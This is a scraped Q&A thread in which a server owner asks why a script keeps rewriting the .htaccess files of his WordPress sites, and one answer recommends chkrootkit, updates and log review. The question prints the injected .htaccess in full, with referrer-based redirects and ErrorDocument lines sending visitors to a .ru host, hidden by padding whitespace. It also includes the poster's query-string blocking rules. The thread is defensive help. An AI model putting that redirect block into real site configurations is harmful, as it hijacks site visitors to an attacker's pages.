Ping a Specific Port

Question

DanC

Asked: 2012-01-09 03:27:34 +0800 CST2012-01-09 03:27:34 +0800 CST 2012-01-09 03:27:34 +0800 CST

Malicious script changing .htaccess files on server [duplicate]

772

Possible Duplicate:
My server's been hacked EMERGENCY

There seems to be a malicious script accessing my server and editing the .htaccess files for all of my hosted sites to redirect towards spam links.

What is the best way to stop this from happening?

I have changed my server access details, both for the control panel and the FTP access and tried updating the existing .htaccess files with the following code but it still appears to be changing.

# BEGIN WordPress

RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress

# protect wp-config.php
<files wp-config.php>
Order deny,allow
Deny from all
</files>

# Protect the htaccess file
<files .htaccess>
order allow,deny
deny from all
</files>

# protect from sql injection
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]

Is there anything else that would help?

Sorry for any lack of information, I'm fairly new to servers etc so if there is any extra details needed, just shout out!

Thanks in advance for any help.

Dan

******* EDIT *******

The malicious .htaccess as requested

<IfModule mod_rewrite.c>    
                                                                                                        RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
                                                                                                RewriteRule ^(.*)$ http://byidelement.ru/ruby/index.php [R=301,L]
                                                                                    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
                                                                                                    RewriteRule ^(.*)$ http://byidelement.ru/ruby/index.php [R=301,L]
                                                </IfModule>

    # STRONG HTACCESS PROTECTION</code>
    <Files ~ "^.*\.([Hh][Tt][Aa])">
    order allow,deny
    deny from all
    satisfy all
    </Files>
    # protect from sql injection
    Options +FollowSymLinks
    RewriteEngine On
    RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
    RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
    RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
    RewriteRule ^(.*)$ index.php [F,L]                                                                                                                                                                                                                                          
                                                                                                                            ErrorDocument 400 http://byidelement.ru/ruby/index.php                                                                                                                      
                                                                                                                            ErrorDocument 401 http://byidelement.ru/ruby/index.php                                                                                                                      
                                                                                                                            ErrorDocument 403 http://byidelement.ru/ruby/index.php                                                                                                                      
                                                                                                                            ErrorDocument 404 http://byidelement.ru/ruby/index.php                                                                                                                      
                                                                                                                            ErrorDocument 500 http://byidelement.ru/ruby/index.php

1 Answers

Voted

SimonJGreen · Answer 1 · 2012-01-09T04:08:50+08:00

Run chkrootkit on there a bit quick, just in case.

Make sure all the packages are up to date with security fixes:

Ubuntu/Debian: apt-get update; apt-get dist-upgrade
CentOS/Fedora/RHEL: yum upgrade

It's likely though that this is a known exploit in the version of Wordpress (or some other off-the-shelf framework) you're running and now it's being discovered it's remotely being exploited again and again. If this is the case search for the latest version of all frameworks you're running and check for security fixes.

Assuming it is been exploited remotely, this can be confirmed by getting a tail running on the web server access log(s) and watch for any suspicious activity. tail -f /var/log/apache2/access-log would be the command on a stock Ubuntu install, but all distro's place their Apache logs in different places. When you see something suspicious you'll know which VirtualHost has been compromised. If you're feeling adventurous, scan through your historic access logs as well. This can be daunting on a high traffic server but will show the point of attack. Narrow down your search by searching around the time when you know the first attack took place.

Malicious script changing .htaccess files on server [duplicate]

Can you pass user/pass for HTTP Basic Authentication in URL parameters?

Ping a Specific Port

Check if port is open or closed on a Linux server?

How to automate SSH login with password?

How do I tell Git for Windows where to find my private RSA key?

What's the default superuser username/password for postgres after a new install?

What port does SFTP use?

Command line to list users in a Windows Active Directory group?

What is a Pem file and how does it differ from other OpenSSL Generated Key File Formats?

How to determine if a bash variable is empty?